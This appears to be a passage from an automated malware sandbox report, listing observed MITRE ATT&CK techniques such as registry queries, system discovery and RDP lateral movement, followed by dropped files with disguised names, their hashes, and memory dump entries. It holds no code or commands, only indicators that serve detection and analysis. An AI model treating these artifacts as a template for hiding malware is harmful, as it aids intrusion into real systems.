    Credential Access

    Discovery

    Query Registry

    3
    T1012

    System Information Discovery

    4
    T1082

    System Location Discovery

    1
    T1614

    System Language Discovery

    1
    T1614.001

    Lateral Movement

    Remote Services

    1
    T1021

    Remote Desktop Protocol

    1
    T1021.001

    Collection

    Command and Control

    Exfiltration

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Program Files\product1\Uninstall\uninstall.xml
      Filesize

      7KB

      MD5

      0f3e7773dcf30497cf4df0fac5cf6f8c

      SHA1

      177b3c6372789761d132982731b079b91c3fac75

      SHA256

      24686f261c62e9f63f4eeb529ab742cb452d25c545d96e7264287b2258a9010d

      SHA512

      6741dcf22722a4bbfb0ac5b467a063177a50b64eb06e5f8931a52c295962c179ef555bdcd5737a4ce447ceda85de23c2aa15751e2c8512aabb318a0d8684bccf

      Download Submit

    • C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
      Filesize

      3KB

      MD5

      69c282fdcd177c1ac4d6709ef841da65

      SHA1

      575cbac132f5215c9446e6b440ca44a2082f0644

      SHA256

      943f169c31c319417e61586d8911057321de04926e01e4cc3e6f57b3b032c28e

      SHA512

      6b686a5d6aabe4681c6e1c83d4f32bd55d9fa26fc25ed72ecd20676c6dd3bd49cee4f1e5d1b25f2d3a90a994be00bf3b1366075272d4c3ea16917806dbbe0ea7

      Download Submit

    • C:\ProgramData\Microsoft\Program\ziliao.jpg
      Filesize

      225KB

      MD5

      e0912d8f267cb5f617cfa2c90695a984

      SHA1

      450e177a6d718219be665fc8b31e6c134951e09b

      SHA256

      ab654928b0ba294bcbd53cf5d83b2b697c330e4ccf1ce33028d8203df59740c1

      SHA512

      f7e8ce2835815470e9470ee770dfdec7931c4e07ed4a83fcd84b84d04e9d343f8bee1ff90e8c5276fa1f544dbd8283d8123a1635b0634acc3260df9db791e207

      Download Submit

    • C:\ProgramData\Program\Uninstall_.exe
      Filesize

      475KB

      MD5

      8d033e8817a7a1c54119523e668f5a32

      SHA1

      579aec8780f968e6e7809e5899bf91d79a026485

      SHA256

      5d75ab6114577bcd82dd2705da8cc33c86bdc9c9fcd0f00a9756aeb18f13f96a

      SHA512

      909145a965f4a550b8e00bfb598b3f475ba7c8ee50d053e74f7208baed335b7f75dab3de1667921f07de4a8d6a44e6c23c355b681dee0a81189e6f09dcacd57d

      Download Submit

    • C:\ProgramData\Program\iusb3mon.dat
      Filesize

      74KB

      MD5

      7db8e66ef74c2ba301c9de02a08aab79

      SHA1

      8e6fc2a3c2374d59602ed5cfc8db0cce528bff46

      SHA256

      9897994028e66eba4c5691fe6ab4d9df527580c8a48f42066e51a82bb6ae2ee9

      SHA512

      30f5f87c68b34d83a6805977d5f573a46ee2b52836b070368427e355aab5823dab617cbe946a93087335a52432ed8689eb527521427049fd4d5f15d01e205278

      Download Submit

    • C:\ProgramData\Program\iusb3mon.exe
      Filesize

      475KB

      MD5

      e79f996b69d7fa546ed9235fdc0ee06d

      SHA1

      b1616a455947ef3f29a4b5afdeda99369fc20bf8

      SHA256

      ec7fcd3f4533d3514a9a42cbc41c40358eea47255bab1171146a5ccebaf20990

      SHA512

      c0fd12425188d81be78be91facace2a036b81e29ffe4fde13b613a40bc20b39c656f1e0d91542b87973ffd2bc44e05b0354ecb1a488d391ee68f48cf43b44cf6

      Download Submit

    • C:\ProgramData\templateWatch.dat
      Filesize

      59KB

      MD5

      02ad2cd3401ba2b6535ca8c4c59cdca8

      SHA1

      0054da15c86ec69825d7b35c24bc59ae166b237a

      SHA256

      c05212a3b64061a29f774c854f53fe91f13da53728be15acb14aeb56cba715de

      SHA512

      045ec50ecb801f5713930fa37e2e08ff0341d98c38842b5c61954c20feb1ce15a90a3b73b4edacdd1b21b64566e4757e90e155b9a417b9d2ff9fa533f5360333

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      Filesize

      2KB

      MD5

      6cf293cb4d80be23433eecf74ddb5503

      SHA1

      24fe4752df102c2ef492954d6b046cb5512ad408

      SHA256

      b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

      SHA512

      0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
      Filesize

      1KB

      MD5

      def65711d78669d7f8e69313be4acf2e

      SHA1

      6522ebf1de09eeb981e270bd95114bc69a49cda6

      SHA256

      aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c

      SHA512

      05b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      64B

      MD5

      367b1c81198bfdcdba813c2c336627a3

      SHA1

      37fe6414eafaaed4abb91c1aafde62c5b688b711

      SHA256

      1141e163d84d5ef0038593c866647f27c55510de2147dc1578130e518a22cced

      SHA512

      e0493957e6602efb156d372e5e66147056f6e3c2e01996ba9b4e04f82b2b1e4c7236d0e3681dce9ab4911a62546b6a141f1ae731de6e8184e758caf120cf594b

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      948B

      MD5

      d7034900aaccbd51366e8a74a1b0cfa6

      SHA1

      b226c96696a213733393f5570758e96edb1dc4b9

      SHA256

      dcf2f979d0fae1d9afad3c6d0236b9e0770b4e1496c94a797a8b8ac2189caf0e

      SHA512

      83f30cfa4196e96b37ea7f77142980d9370a23f6753c3de4b6f3796d41518626f9ae15f17bd08b29ac23ab0efb29579c0a8527dd90056da1644f50d442c3c311

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      948B

      MD5

      217d9191dfd67252cef23229676c9eda

      SHA1

      80d940b01c28e3933b9d68b3e567adc2bac1289f

      SHA256

      e64811c3e57476bb644539824034cabe2cabcb88941122193e2af328f5eb2133

      SHA512

      86767aa3c0eec425b7c6dbfd70a4a334fb5b1227c05fb06fbb3845e7b6974008386276f441c8e66e2bf9b0ae0a76133c4e5602211788cd702eaeadd12c5ff757

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      944B

      MD5

      96ff1ee586a153b4e7ce8661cabc0442

      SHA1

      140d4ff1840cb40601489f3826954386af612136

      SHA256

      0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8

      SHA512

      3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      373474059f490516ec3b43e2c1e02ae1

      SHA1

      e5b5ae76995215623177edc39791174738efdb3e

      SHA256

      b057035f03b6a0126259fc9b4c41d2b741e3c255bde50876c05ea36a2af6d4ff

      SHA512

      a9b922dcc6fa3d58d02d3efe49f73dd9e8c9ec5b4bfa5813d3e67ce6545e0cf1f69376fd7c7527101ed4dbc229a7f12fb3bc3159aa5847be3f689a6b14b069c1

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      16KB

      MD5

      e70ffa6bb5e42cadc69bbb0e86a785ff

      SHA1

      c5149315c7d132b6ea4cb1f3eec3820d8e2432a3

      SHA256

      2fd5c2bdfc899f6b795895877f1a53e97d94decbe14ae4c2fb277b187107516e

      SHA512

      bceac82b8813df66a27a6e2a6df18ff7ede37a78ed157e4995b02c281711fafdccbf22e2cdf467a1353c0957edd43a30b40c76d413eaa3581d3ed615f62160a0

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      16KB

      MD5

      b948a3ece2d65e776eabb8161581abcd

      SHA1

      db3e45e6930b70d83f4cc35f06448667726f9092

      SHA256

      dbd97f7f63f7f92300ef0ca40e091c4f27d9e29ef8c15bd805514b606f2343e8

      SHA512

      1052d760ab5f75664dafd24dcacc52101daacc26ab84bc47dcc9b305da86828b3c24c9e061909824e07f6f730d5de346d79464d2914e746c5178266a8005a84c

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      16KB

      MD5

      f6e94ec63d5cf9a4292d222ef2fdc82d

      SHA1

      92379d2eab1e31e72d6fc5394eed3ca81b0bc035

      SHA256

      08626239e4670f6c48e0c0f44a5aa65ad1f20e6a9e4ce4d6dfe579062f293946

      SHA512

      6a2ae6a701af363f9bb0d0fdcee8bc72b2535d11da08418de405cad6a99366d276a34d7a0aa11b5d93f8ca3ab2d031cdb04029052f9574ed061c1f15c9686c2b

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege1.log
      Filesize

      2KB

      MD5

      c6f29cf6f15bc123d0ac663038ccf886

      SHA1

      ad32e0b495d9d8e55265a3d5b0d6aad1f2123563

      SHA256

      467ef56719b3c527d861fb7874b121c8042500e86a15e04bbcef9b20834b6884

      SHA512

      c455195328246088393590197a08b19e530823510fe76247c786b96eb1ca32160969527b4eef571acef01b54d6406b04fe0cfb5a98b32290fe9fdd5c67ff23cc

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege2.log
      Filesize

      1KB

      MD5

      1ceb5165f1e435a8132c403c6542ae95

      SHA1

      cd650376bce0babd4b07b31ad595da00c8d2ed1a

      SHA256

      e5bb3bd3f3b81693d0727993a631950aee7f100f23d5090ec20e320bb0813dbf

      SHA512

      b01b4ef1dba12736e5155a3111e23b74bfaba900239b116d3d5e9a190cb7775a8d42049b1db91d069845e585ec8004fc415bdd061b8efd73dd719f4f8a3b9953

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege3.log
      Filesize

      2KB

      MD5

      380c0bb0dff3c47f06e90e6908a34d1a

      SHA1

      ed7b26eafb1de476cb2e701fc278a509b367a77d

      SHA256

      b5c4688241bf8318161a0f72358ed49979e0b805e3277330322f2b659328d68e

      SHA512

      51d46e2c827e314540190ab06b6f28356aedecd7d8a7aaacc221a54d54f9a8538e60bfe7c1c75b6b1eeb9f432fdd2d5af46c77d8dde4966f45d96ebde49b5ca1

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege4.log
      Filesize

      2KB

      MD5

      e56fb06f9a607aa6c8152a4fc8e96706

      SHA1

      bc38d07f503c3c49fe6e84a8022d53ac93082446

      SHA256

      dbd0fd8d055836f959b37fdace40b39eee306817c41da62e9fd34fa2d5196a12

      SHA512

      d7f370f50719df1c1622354d2093cd65ffd9223a2a09674eae47d52b713bd6cf84be215dddc8c2f1480cb12173c2251a3a83409ac6267bda46248b922df3265d

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege4.log
      Filesize

      2KB

      MD5

      5a18280aed20e8cc704c6211597e4195

      SHA1

      4286c3091e9bd83e03f1dd3b498b26b5cfb3741d

      SHA256

      4ef2d1e0d41531cbf24b559261586d4abb7f3aaa8637bd895f630ed3b1d3ba45

      SHA512

      49051747339cd89a2d3892f8b133ef60ff696681cdeaa257039763c37c8d606904c6b2ca3c623adf1a2d7002f5f44f1418fea017d9fc42ef688d3d2b2230dd85

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xf2dy0bm.wpo.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\IRIMG1.JPG
      Filesize

      2KB

      MD5

      3220a6aefb4fc719cc8849f060859169

      SHA1

      85f624debcefd45fdfdf559ac2510a7d1501b412

      SHA256

      988cf422cbf400d41c48fbe491b425a827a1b70691f483679c1df02fb9352765

      SHA512

      5c45ea8f64b3cdfb262c642bd36b08c822427150d28977af33c9021a6316b6efed83f3172c16343fd703d351af3966b06926e5b33630d51b723709712689881d

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe
      Filesize

      4.9MB

      MD5

      2a7d5f8d3fb4ab753b226fd88d31453b

      SHA1

      2ba2f1e7d4c5ff02a730920f0796cee9b174820c

      SHA256

      879109ae311e9b88f930ce1c659f29ec0e338687004318661e604d0d3727e3cf

      SHA512

      fa520ebf9e2626008f479c6e8f472514980d105f917c48ad638a64177d77c82a651c34ed3f28f3e39e67f12e50920503b66e373b5e92cf606bc81dc62a6b3ea4

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\lua5.1.dll
      Filesize

      329KB

      MD5

      958103e55c74427e5c66d7e18f3bf237

      SHA1

      cea3fc512763dc2ba1cfa9b7cb7a46ae89d9fcd8

      SHA256

      3ea4a4c3c6dea44d8917b342e93d653f59d93e1f552ace16e97e43bb04e951d8

      SHA512

      02ed6e1f24ef8f7f1c0377fa86a3a494b8a4474472ab7001f7902f2f3afa6cd975dc69fcab6f5524545a67657ecccfcd4ed2c95431843e9d50f2fff4c5178dbe

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\_ir_tu2_temp_0\IRIMG2.JPG
      Filesize

      6KB

      MD5

      e39405e85e09f64ccde0f59392317dd3

      SHA1

      9c76db4b3d8c7972e7995ecfb1e3c47ee94fd14b

      SHA256

      cfd9677e1c0e10b1507f520c4ecd40f68db78154c0d4e6563403d540f3bf829f

      SHA512

      6733f330145b48d23c023c664090f4f240e9bbeb8368b486c8ee8682ec6a930b73275e24075648d1aa7e01db1ec7b7e259286917a006ba9af8fb7cba3439070a

      Download Submit

    • \??\c:\inst.ini
      Filesize

      2B

      MD5

      81051bcc2cf1bedf378224b0a93e2877

      SHA1

      ba8ab5a0280b953aa97435ff8946cbcbb2755a27

      SHA256

      7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6

      SHA512

      1b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d

      Download Submit

    • memory/1264-188-0x0000000002BC0000-0x0000000002BF6000-memory.dmp

      Filesize

      216KB

      Download

    • memory/1264-242-0x0000000007A90000-0x0000000008034000-memory.dmp

      Filesize

      5.6MB

      Download

    • memory/1264-192-0x0000000005A10000-0x0000000005A76000-memory.dmp

      Filesize

      408KB

      Download

    • memory/1264-234-0x0000000006210000-0x000000000625C000-memory.dmp

      Filesize

      304KB

      Download

    • memory/1264-233-0x0000000006180000-0x000000000619E000-memory.dmp

      Filesize

      120KB

      Download

    • memory/1264-190-0x00000000051C0000-0x00000000051E2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/1264-239-0x0000000007440000-0x00000000074D6000-memory.dmp

      Filesize

      600KB

      Download

    • memory/1264-241-0x00000000066E0000-0x0000000006702000-memory.dmp

      Filesize

      136KB

      Download

    • memory/1264-240-0x0000000006670000-0x000000000668A000-memory.dmp

      Filesize

      104KB

      Download

    • memory/1428-72-0x00000205A6170000-0x00000205A6192000-memory.dmp

      Filesize

      136KB

      Download

    • memory/2736-175-0x0000000002C40000-0x0000000002C4F000-memory.dmp

      Filesize

      60KB

      Download

    • memory/2736-236-0x0000000003860000-0x00000000038A0000-memory.dmp

      Filesize

      256KB

      Download

    • memory/2736-184-0x0000000003860000-0x00000000038A0000-memory.dmp

      Filesize

      256KB

      Download

    • memory/2736-178-0x0000000003860000-0x00000000038A0000-memory.dmp

      Filesize

      256KB

      Download

    • memory/2736-171-0x0000000010000000-0x0000000010004000-memory.dmp

      Filesize

      16KB

      Download

    • memory/2736-170-0x0000000003550000-0x0000000003552000-memory.dmp

      Filesize

      8KB

      Download

    • memory/2736-151-0x0000000000400000-0x000000000053F000-memory.dmp

      Filesize

      1.2MB

      Download

    • memory/2736-204-0x0000000003860000-0x00000000038A0000-memory.dmp

      Filesize

      256KB

      Download

    • memory/2736-347-0x0000000000400000-0x000000000053F000-memory.dmp

      Filesize

      1.2MB

      Download

    • memory/4804-189-0x00000000055F0000-0x0000000005C18000-memory.dmp

      Filesize

      6.2MB

      Download

    • memory/5112-191-0x0000000005230000-0x0000000005296000-memory.dmp

      Filesize

      408KB

      Download

    • memory/5112-203-0x0000000005C20000-0x0000000005F74000-memory.dmp

      Filesize

      3.3MB

      Download